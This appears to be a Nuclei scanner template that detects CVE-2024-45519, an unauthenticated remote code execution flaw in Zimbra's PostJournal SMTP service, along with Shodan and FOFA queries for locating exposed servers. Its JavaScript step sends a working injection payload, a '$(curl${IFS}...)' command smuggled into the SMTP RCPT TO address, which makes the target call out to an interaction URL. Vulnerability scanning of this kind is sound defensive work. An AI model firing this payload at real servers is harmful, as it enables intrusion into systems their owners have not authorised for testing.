id: CVE-2024-45519

info:
  name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution
  author: pdresearch,iamnoooob,parthmalhotra,ice3man543
  severity: critical
  description: |
    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality.
  impact: |
    Unauthenticated attackers can inject arbitrary operating system commands through the PostJournal SMTP service, achieving remote code execution under the Zimbra user context.
  remediation: |
    Upgrade Zimbra Collaboration Suite to version 9.0.0 or later that properly sanitizes SMTP input.
  reference:
    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
    - https://blog.projectdiscovery.io/zimbra-remote-code-execution/
  classification:
    epss-score: 0.94157
    epss-percentile: 0.99919
    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
  metadata:
    vendor: synacor
    product: zimbra_collaboration_suite
    shodan-query:
      - http.title:"zimbra collaboration suite"
      - http.title:"zimbra web client sign in"
      - http.favicon.hash:1624375939
    fofa-query:
      - title="zimbra web client sign in"
      - title="zimbra collaboration suite"
  tags: js,cve,cve2024,smtp,rce,zimbra,kev,vkev,vuln

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/net');
      let address = Host+":"+Port;
      let conn;
      conn=  m.Open('tcp', address)
      conn.Send('EHLO localhost\r\n');
      conn.RecvString()
      conn.Send('MAIL FROM: <aaaa@mail.domain.com>\r\n');
      conn.RecvString()
      conn.Send('RCPT TO: <"aabbb$(curl${IFS}'+oast+')"@mail.domain.com>\r\n');
      conn.RecvString()
      conn.Send('DATA\r\n');
      conn.RecvString()
      conn.Send('aaa\r\n');
      conn.RecvString()
      conn.Send('.\r\n');
      resp = conn.RecvString()
      conn.Send('QUIT\r\n');
      conn.Close()
      resp
    args:
      Host: "{{Host}}"
      Port: 25
      oast: "{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "message delivered"
# digest: 4a0a00473045022100976035fc13dff3a770c20bdb349f30009e57e8b58685698c7e69aeeb986a65b90220508cda4acbec348501ba24102dfe93ef0c4a61b29fa248a4d0d92187a9cbc7ea:922c64590222798bb761d5b6d8e72950